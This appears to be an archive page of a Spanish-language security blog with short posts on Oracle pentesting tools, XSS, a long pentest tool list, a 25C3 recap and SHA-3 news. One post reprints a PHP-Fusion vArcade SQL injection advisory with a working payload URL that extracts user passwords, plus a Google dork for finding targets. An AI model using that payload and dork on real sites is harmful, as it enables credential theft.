Felices Fiestas... ¿Para quién?

Algo que era de esperarse, las fiestas no llegaron solas (no hombre, nadie les ha traído regalos, o al menos ese tipo de regalos) s no quieren creerme pégenle una mirada a ésta nota de PC World.

Saludos, Leer más...

PenTest de Oracle DataBases

Como prometí...
El Penetration Testing suele involucrar diversas áreas, entre ellas podemos destacar las bases de datos. En este post les mostraré las _no_tan_ conocidas herramientas para realizar PenTesting de bases de datos Oracle.

OScanner: Oscanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with a couple of plugins that currently do:

- Sid Enumeration
- Passwords tests (common & dictionary)
- Enumerate Oracle version
- Enumerate account roles
- Enumerate account privileges
- Enumerate account hashes
- Enumerate audit information
- Enumerate password policies
- Enumerate database links

The results are given in a graphical java tree.

Oracle Auditing Tools (OAT): The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.

DBPwAudit: DBPwAudit is a Java tool that allows you to perform online audits of password quality for several database engines. The application design allows for easy adding of additional database drivers by simply copying new JDBC drivers to the jdbc directory. Configuration is performed in two files, the aliases.conf file is used to map drivers to aliases and the rules.conf tells the application how to handle error messages from the scan.

SidGuesser: Guesses sids/instances against an Oracle database according to a predefined dictionary file.


Links de interes:

• Introduction to Simple Oracle Auditing
• Peter Finnigan - Audit.sql
• Oracle Metalink
• Pappers de PenTest en Oracle DBs

Leer más...

ojo! No subestimes los XSS!

Debido al post que publique recientemente, me he sentido preocupado al decir lo ineficaz que pueden resultar los XSS. Ésto me hizo recordar un post de s21sec en donde claramente nos decían que no se debe subestimar los XSS, ¿porque? Mírenlo aquí y entiendan mejor las cosas ;).

Algo a destacar es que los XSS son las vulnerabilidades más comunes en páginas web. Algo preocupante y que además llama la atención ya que es relativamente sencillo solucionar este tipo de problemas.

Saludos, Leer más...

XSS - Cross Site Scripting

Hoy he vuelto a desenterrar este tema, ya por mi olvidado debido a su limitado e ineficaz uso (igualmente, siempre hay alguien a quien podremos hacer caer ¬¬ ). Sin embargo, vengo aquí solo para mostrarles un par de documentos con buena información referente al tema:

XSS - Cross Site Scripting Explained (PDF en inglés).
Cross Site Scripting - By Soulblack (PDF en Español).

Saludos, Leer más...

Windows 7 breve review.

Buenas, como muchos ya sabrán se ha liberado la versión Beta (1) de Windows 7, y muchos ya han podido probarla, entre ellos un "Maligno" al cual sigo desde hace rato y por ser, como el mismo se titulo, "Mas Valiosa Perra" (entre otras cosas) ha tenido el "agrado de probarlo", en su blog hay un breve review de esta versión.
Para nosotros, los que no somos "Mas Valiosas Perras" ni nada por el estilo nos tendrá que bastar con buscarlo en la web ;)

Breve Review de Windows 7 Leer más...

Sql Injection Vulnerability en PHP-Fusion.

Usar con cuidado y con fines educativos solamente :)

----------------------------------------------------------------
Script : PHP-Fusion Mod vArcade 1.8
Type : Sql Injection Vulnerability
Risk : High
----------------------------------------------------------------
Download From : http://venue.nu/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
My Official Website : http://FEREIDANI.IR
Our Team Website : http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------
Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/
----------------------------------------------------------------
Tnx : God
http://IRCRASH.COM http://FEREIDANI.IR
---------------------------------------------------------------- Leer más...

Taller Forensics I. FATxx

Buenas, les dejo a todos el link al tallar de Forensics Nro 1 que ha realizado el gran Vic Thor, espero que les sirva y les agrade tanto como a mi :).

Taller Forensics I

Saludos, Leer más...

Penetration Testing Tools

Una lista muy completa de herramientas para PenTesting, toda la info fue extraída de forinsect.

Packet Shaper:
• Nemesis: a command line packet shaper
• Packit: The Packet Toolkit - A network packet shaper.
• Hping by Antirez: a command line TCP/IP packet shaper
• Sing: stands for 'Send ICMP Nasty Garbage'; sends fully customizeable ICMP packets
• Scapy: a new python-based packet generator

Password Cracker/Login Hacker:
• John the Ripper: a well-known password cracker for Windows and *nix Systems
• Djohn: a distributed password cracker based on "John the Ripper"
• Cain & Abel: an advanced password recovery tool for windows systems. It sniffs the network packets an cracks authentication brute-force or with dictionary attacks.
• Project RainbowCrack: Advanced instant NT password cracker
• Rainbowtables: The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).
• Windows NT password recovery tool by Peter Nordahl
• THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.
• Hydra by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus.
• Medusa: parallel network login auditor
• THC imap bruter: a very fast imap password brute forcer
• x25bru: a login/password bruteforcer for x25 pad
• Crowbar: a generic web brute force tool (Windows only; requires .NET Framework)
• MDCrack-NG: a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables

Advanced Sniffers:
• Wireshark (formerly known as Ethereal): an open source network protocol analyzer
• Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools
• Ettercap: a multipurpose sniffer/interceptor/logger for switched LAN environments
• aimsniffer: monitors AOL instant messager communication on the network
• 4G8: a tool ,similar to ettercap, to capture network traffic in switched environments
• cdpsniffer: Cisco discovery protocol (CDP) decoding sniffer

Port Scanner / Information Gathering:
• nmap: the currently most well-known port scanner. Since version 3.45 it supports version scans. Have a look at PBNJ for diffing different nmap scans.
• ISECOM released their nmap wrapper NWRAP, which shows all known protocols for the discovered ports form the Open Protocol Resource Database
• Nmap::Scanner: Perl output parser for nmap
• Amap by THC: An advanced portscanner which determines the application behind a network port by its application handshake. Thus it detects well-known applications on non-standard ports or unknown applications on well-known ports.
• vmap by THC: version mapper to determine the version (sic!) of scanned daemons
• Unicornscan: a information gathering and correlation engine
• DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
• Athena: a search engine query tool for passive information gathering

Security Scanner:
• Nessus - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.
• OpenVAS: a fork of Nessus 2.2.5 (formerly known as GNessUs)
• Nessj: a java based nessus (and compatibles) client (formerly known as Reason)
• Paul Clip from @stake released AUSTIN, a security scanner for Palm OS 3.5+.

Webserver:
• Nikto: a web server scanner with anti IDS features. Based on Rain Forest Puppies libwhisker library.
• Wikto: a webserver assessment tool (Windows only; requires .NET framework)
• WSDigger: a black box web pen testing tool from Foundstone (Windows based)
• Metis: a java based information gathering tool for web sites

Fingerprinting:
• SinFP: a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets
• Winfingerprint: much more than a simple fingerprinting tool.It scans for Windows shares, enumerates usernames, groups, sids and much more.
• p0f 2: Michal Zalewski announced his new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a completely rewrite of the old p0f code.
• xprobe2: a remote active operating system fingerprinting tool from Ofir Arkin and the xprobe2 team
• Cron-OS: an active OS fingerprinting tool based on TCP timeout behavior. This project was formerly known as "RING" and is now published as a nmap addon.
Proxy Server:
• Burp proxy: an interactive HTTP/S proxy server for attacking and debugging web-enabled applications
• Screen-scraper: a http/https-proxy server with a scripting engine for data manipulation and searching
• Paros: a man-in-the-middle proxy and application vulnerability scanner
• WebScarab: a framework for analyzing web applications. One of it's basic functionality is the usage as intercepting proxy.

War Dialers:
• IWar: a classic war dialer, now also with VOIP (IAX2) support. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)
• THC-Scan: a war dialer for DOS, Windows and DOS emulators
Malware / Exploit Collections:
• packetstormsecurity.org: Huge collections of tools and exploits
• ElseNot Project: The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.
• Offensive Computing: Another malware collection site
• Securityforest: try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff

Databases / SQL:
• sqlninja: a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
• CIS Oracle Database Scoring Tool: scans Oracle 8i for compliance with the CIS Oracle Database Benchmark
• SQLRecon: an active and passive scanner for MSSQL server. Works on Windows 2000, XP and 2003.
• absinthe: a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection (see here and here).
• SQL Power Injector: a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)
Voice over IP (VOIP):
• vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
• SiVuS: a VOIP vulnerability scanner - SIP protocol (beta, Windows only)
• Cain & Abel: mostly a password cracker, can also record VOIP conversations (Windows only)
• sipsak (SIP swis army knife): a SIP packet generator
• SIPp: a SIP test tool and packet generator
• Nastysip: a SIP bogus message generator
• voipong: dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
• Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
• rtptools: a toolset for rtp recording and playing

Networkbased Tools:
• yersinia: a network tool designed to take advantage of some weakeness in different network protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
• Netsed: alters content of network packets while forwarding the packets
• ip6sic: a IPv6 stack integrity tester

VPN:
• ike-scan: an IPSec enumeration and fingerprinting tool
• ikeprobe: ike scanning tool
• ipsectrace: a tool for profiling ipsec traffic in a dump file. Initial alpha release
• VPNMonitor: a Java application to observer network traffic. It graphically represents network connections and highlights all VPN connections. Nice for demonstrations, if somewhat of limited use in a real pen test.
• IKECrack:an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])
DNSA: DNS Auditing tool by Pierre Betouin

A little more:
Hunt: a session hijacking tool with curses GUI
SMAC: a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.
The WebGoat Project: a web application written in Java with intentional vulnerabilities. Supports an interactive learning environment with individual lessons.
TSCrack: a Windows Terminal Server brute forcer
Ollie Whitehouse from @stake released some new cellular phone based pentesting tools for scanning (NetScan, MobilePenTester). All tools require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems no longer to support much of their free security tools. So, use instead the alternativ download links above.
THC-FuzzyFingerprint: generates fuzzy fingerprints that look almost nearly equal to a given fingerprint/hash-sum. Very useful for MITM attacks.
BeatLM, a password finder for LM/NTLM hashes. Currently, there is no support for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM.
THC vlogger: a linux kernel based keylogger
The Metasploit Framework: an "advanced open-source platform for developing, testing, and using exploit code".
ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)
Pirana: an exploitation framework to test the security of email content filters. See also the whitepaper
PassLoc: a tool which provides the means to locate keys within a buffer. Based on the article "Playing hide and seek with stored keys" by Adi Shamir.
Dl-Hell: identifies an executables dynamic link library (DLL) files
DHCPing: a security tool for testing dhcp security
ldapenum: a perl script for enumeration against ldap servers.
Checkpwd: a dictionary based password checker for oracle databases
NirCmd from NirSoft: a windows command line tool to manipulate the registry, initiate a dialup connection and much more
Windows Permission Identifier: a tools for auditing user permissions on a windows system
MSNPawn: a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required
snmpcheck:a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.
pwdump6: extract NTLM and LanMan hashes from Windows targets

Aprovéchenla, en breve un par más ;-)
Leer más...

25th Chaos Communication Congress

The 25th Chaos Communication Congress is over and again has been a great success. About 5.000 people gathered in the Congress Center in the heart of Berlin. As usual, the event was a great mixture of lectures and workshops; serious and funny things around "hacking". [25c3 wiki]

Down near the "Lounge" was the Hackcenter with its different projects. Here you could build your own quadrocopter [video] [info] , extend your IXUS camera with additional features like adjustable shutter speed [info], have fun with microcontrollers [info] or relax while playing a round of 3d-pong [video] in the blinkenarea. A complete list of all projects held at the 25c3 can be found here.

Dan Kaminsky's talk about DNS was very interesting, although there was nothing really new. Basically it was a summary with the most relevant information around the DNS bug which was published this year. [video]

Jacob Appelbaum not only had his lecture about the Cold Boot Attacks [info] , but with Alexander Sotirov and his crew he also held the famous talk about creating a malicious root CA based on a MD5 collision attack. [S21sec blog] [slides] [video] [info]

Thorsten Holz spoke about their attempt to analyze banking malware and find the related C&C servers in an automated way. Among other things they improved and extended www.cwsandbox.org - a binary analyzer like virustotal.com - being able to simulate user interaction in order to behave like a human and e.g. enter credentials into sensitive web sites. They also managed to find and identify lots of "Dropzones" - including full access to some of them. With statistic information about the gathered data of the last seven months he finished this very interesting talk. [slides] [info]

Felix Lindner aka FX had a very interesting speech about a new generation of Cisco exploits. His attempt was to find a generic and version independent way of exploiting Cisco routers. [slides]

These have only been some of my personal favorites, you can find an overview of all the talks at the following links. Some, but not all the slides and videos are published yet. If audio is enough for you, there you'll find a few more. [talks] [slides] [videos] [audio]

Lets see if the coming 26c3 congress will again be placed in Berlin's Congress Center since it was quite overcrowded and hard to get into some of the lectures.

Finally here you have some random and related links: [flickr] [youtube] [Dan Kaminsky's Pics]

Clemens Kurtenbach
S21sec e-crime

Fuente: s21sec Leer más...

Seguridad en las sesiones de las aplicaciones Web

s21sec ha lanzado una serie de notas acerca de la Seguridad en las sesiones de las aplicaciones web. Realmente cuentan con información muy completa, actualmente van por la tercer entrega, y es por ello que se las recomiendo! No se lo pierdan!

Seguridad en las sesiones de las aplicaciones Web I
Seguridad en las sesiones de las aplicaciones Web II
Seguridad en las sesiones de las aplicaciones Web III

Saludos, Leer más...

Cryptographic hash Algorithm Competition

Por si muchos no lo sabían les cuento que se esta realizando una competencia para determinar el nuevo algoritmo de cifrado, que se llamará SHA-3. En la primer ronda ya quedan 51 de los 64 participantes iniciales y aún se continúa realizando el análisis sobre los algoritmos restantes.
En ésta página pueden ver cuales de los algoritmos ya han sido quebrados y la técnica que se utilizo para lograrlo (en otro post detallaremos qué significa cada método).
Veremos quién resulta victorioso!

Más información en:

• Wikipedia
• NIST (National Institute of Satndards and Technology)
• s21sec
  

Leer más...

Obtener pass con hash MD5

Seguramente todos han oido hablar del algoritmo de encripcion MD5 ya que su uso es muy extenso cotidianamente. Es por ello que será de interes saber la clave un password cifrado con este algoritmo, es por ello que aquí les recomiendo una página en donde ya estan alojadas muchísimas claves ya calculadas: PassCracking.ru, espero que les sea de ayuda ;)

Saludos, Leer más...

Advanced SQL Injection in SQL Server Applications

Buscando información para resolver el nivel 6 del Blindsec Game me encontré en la necesidad de estudiar a fondo las SQL Injections, para esto halle un magnífico papper en inglés Advanced SQL Injection in SQL Server Applications que neofito ha traducido :)

Ver archivo original en inglés.
Ver versión traducida por neófito. Leer más...

IPv6 on Windows.-

Hoy estaba leyendo el blog de Richard Bejtlich y me descubrí que ya estaba disponible la opción de realizar conexiones IPv6 mediante el uso de un programa (Gateway 6 6.0-BETA4 Client) de go6. Este soft nos introduce la posibilidad de establecer una conexión que nos asignará una dirección ipv6, nada del otro mundo, pero podremos entrar a ipv6.google.com :).

fuente original y más detalles: IPv6 Tunnel on Windows XP Using Freenet6 (TaoSecurity)
Soft disponible en Go6. Leer más...

Oracle Default Password List

No hay mucho que explicar, el título es muy ilustrativo. Pueden bajarsela del sitio de Pete Finnigan en diversos formatos (.csv , .sql, .xls, .sxc, .htm).

Chequeen ustedes aquí.

Saludos, Leer más...

The Official Nmap Project Guide to Network Discovery and Security Scanning

Como sabrán (aunque puede que algunos nos e hayan enterado) de mano de Fyodor se viene este práctico libro que tendrá como finalidad introducirnos en el magnífico mundo del Nmap, el cual es para mi gusto, una de las mejores herramientas que se han diseñado. Muchos deben conocerlo ya, y si no es así no se que esperan para entrar a la sección de descargas.
Pueden ver la primer mitad del libro en la página de Nmap, sección book ;).

Saludos, Leer más...

Aramando nuestra portátil

Algo que siempre quise hacer :-)

http://www.vjspain.com/articulos/tutoriales/HARD_portatil_maleta_DLCRW.pdf

Saludos, Leer más...